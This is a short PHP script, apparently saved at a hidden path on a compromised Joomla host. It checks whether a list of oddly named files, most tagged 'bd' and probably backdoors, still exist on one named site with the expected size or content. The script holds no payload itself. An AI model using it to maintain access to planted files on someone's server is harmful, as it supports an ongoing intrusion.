File: //var/run/shm/.val
<?php $r = '/home/iexcel/gama.iexcel.no'; $x = ["/components/com_comprofiler/plugin/user/plug_cbpaidsubscriptions/plugin/cbsubscontent/adsadvanced.php"=>"bd@@1110027@@455",
"/administrator/components/com_eventlist/tables/eventlist_categories.php"=>"bd@@1109522@@CzmiQu",
"/components/com_comprofiler/plugin/user/plug_cbpaidsubscriptions/plugin/cbsubscbfield/kettenrad.php"=>"bd@@1109280@@1084",
"/administrator/components/com_jtagpresentationforslidshare/views/categories/tmpl/ebank_validation.php"=>"bd@@1110072@@1623",
"/media/zoo/applications/documentation/templates/default/assets/css/idv_mailin_form.php"=>"bd@@1109834@@616",
"/components/com_comprofiler/plugin/user/plug_cbpaidsubscriptions/plugin/cbsubscbfield/lang_nl.php"=>"bd@@1109326@@643",
"/administrator/components/com_smartformer/plugins/tcpdf/fonts/helveticabi.php"=>"bd@@1326714@@2911",
"/tmp/install_4b2180332eb16/files/forced/administrator/components/com_advancedmodules/elements/version.php"=>"bd@@1109899@@409",
"/media/zoo/applications/documentation/templates/default/assets/css/fr.php"=>"bd@@4067731@@596",
"/components/com_kunena/template/default/plugin/captcha/index.php"=>"bd@@1324707@@1038",
"/administrator/components/com_jce/groups/views/users/tmpl/nntp.php"=>"bd@@1109949@@1644",
"/components/com_content/views/category/view.html.php"=>"bd@@1109708@@BonvEP",
"/components/com_comprofiler/plugin/user/plug_cbpaidsubscriptions/plugin/cbsubscontent/KVForm.php"=>"bd@@3500498@@33",
"/media/install_4c34ec066898e/plug_cbsubsfieldstabsprotect/cbsubs.fieldstabsprotect.php"=>"bd@@1109753@@hub_center",
"/tmp/install_4bacaf46cc791/norwegian_kunena_1.0.11_1.5.9_utf8/components/com_kunena/template/default_ex/images/norwegian/emoticons/icon.png"=>"ui@@1509@@106",
"/index.php"=>"ui@@1509@@icon.png"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');